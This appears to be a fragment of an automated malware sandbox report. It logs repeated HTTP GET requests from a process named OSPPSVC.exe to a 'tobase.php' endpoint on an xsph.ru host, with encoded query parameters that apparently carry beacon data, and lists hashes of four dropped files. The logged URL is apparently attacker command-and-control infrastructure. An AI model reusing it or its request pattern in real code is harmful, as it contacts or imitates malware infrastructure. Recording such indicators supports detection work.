141.8.197.42:80http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kEhttpOSPPSVC.exe744 B 917 B 5 5
HTTP Request
GET http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kEHTTP Response
400 -
141.8.197.42:80http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kEhttpOSPPSVC.exe720 B 917 B 5 5
HTTP Request
GET http://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kEHTTP Response
400
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
849KB
MD53ca656973c558fa4c416836f10bc31d1
SHA12e6e2e2e26d3a6c2c44c5185767847d022287b47
SHA25658db76fc7a00fb1db766d4fbe5dda6457878b807757f2791f18707c50cb57905
SHA51282d9518fed6d9cf1e5e78efeaf1f9de40870f5f654c1fb81f1b92c68cea9b93ce1d52eda7713e966cbfce0b99e5b587a99b55996a0f68bab020bebb43465d112
-
Filesize
849KB
MD5c45000d07293154a655ba52ffb7bab99
SHA14b4fbc2c00cf6c6c6fcea58074213c4f0606b80a
SHA256f639fc426671cba387b08b8c14743bccfd9d13866982573a1ed2e150967c17ac
SHA5122805351e0080a62061efb9bc7e3d953221df1180edfcf1142b59302a0afbcf3332a8855deaa9f147ebb11789a3cdbadf6073306000d03698537813bf579df674
-
Filesize
849KB
MD5e0f80964abfaf7e69387c2ab2fe2af79
SHA12f6a73f00885cb34fe013b99231f6d0a87d58b27
SHA25637f4e5c6d7c399cbeaf132faa2d55a8cc3606db609b283db7f1b4a30530c92f9
SHA512f06ccadfd00ea7003bca0c7e359f623b35fed21a19e744f2d04da27e650920eb9d344a0f488a8abeed64a6f293ed500b6632c59c3340cdadf117fccae820d57c
-
Filesize
201B
MD5c2fd7983e12c2da000a31ddaf9594969
SHA1cf029e082db6d03f56934faa31d93ee326f79e2a
SHA256fa83a95a199133f63faf6de1013264e6fc215a65a0476f23458e463d823481b6
SHA512834296179bcac70d89ae2deb3c37d4992622fefb13a5c322ccae47fd643c40fe2e76442f7ea61ba5fd216cb731ed4e4fb939c4219fceb207a77d485d9a2a2c25